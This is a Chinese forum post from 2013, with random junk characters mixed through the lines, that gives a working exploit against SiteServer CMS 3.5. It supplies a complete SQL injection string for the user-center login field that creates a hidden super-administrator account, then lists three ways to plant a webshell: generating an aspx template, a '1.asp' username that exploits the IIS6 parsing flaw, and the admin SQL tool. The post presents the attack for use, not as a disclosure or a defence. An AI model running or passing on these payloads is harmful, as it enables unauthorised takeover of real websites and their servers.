经测试秒杀最新的3.5版
4 s8 _" E7 V' g' nstieserver官网:www.siteserver.cn
0 h- l5 k- B6 G: y% {+ c: ]5 sEXP:
' O/ |2 D y2 g直接访问UserCenter/login.aspx$ S, u2 J8 t# K
用户名处输入:
! x5 L- X$ _4 U& Q" g( Z6 z
. l; g4 I6 ^: t% O* ~1 n7 t: c123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
4 W* D9 C5 H, Y0 K8 Q) C& @密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
) c% v8 I2 o ~) H# u8 Z# j& @之后再访问后台SiteServer/login.aspx用插入的用户登陆
! \8 L% O9 {; z* P2 s) v后台拿webshell的三种方法:
4 `. g. x5 ]0 s一、
; u1 f1 W) S) C0 G4 l! Q" w/ i站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
; i5 ^* k" R ]/ ?5 l1 e* n2 O二、 t$ A; y: [% i. V, x
成员权限-》添加用户-》用户名为:1.asp
6 {9 W+ R3 F" k! i- I1 {http://127.0.0.1/usercenter/ F6 n( R& J9 ^9 {+ z, j6 S% j
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell {; y6 c, f# t7 d/ r+ {
(ps:后台添加用户时不会验证是否含有非法字符). H2 f) g8 u4 ~: [9 K- A- A/ Z
三、4 G8 G9 m* ]$ |5 L! {
系统工具-》实用工具-》机器参数查看
1 U- c4 c$ }1 a可以看到数据库类型、名称,WEB路径, i8 W+ t5 F4 ~7 Z9 I
系统工具-》数据库工具-》SQL语句查询
& T0 }# M3 o8 |3 }. u这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对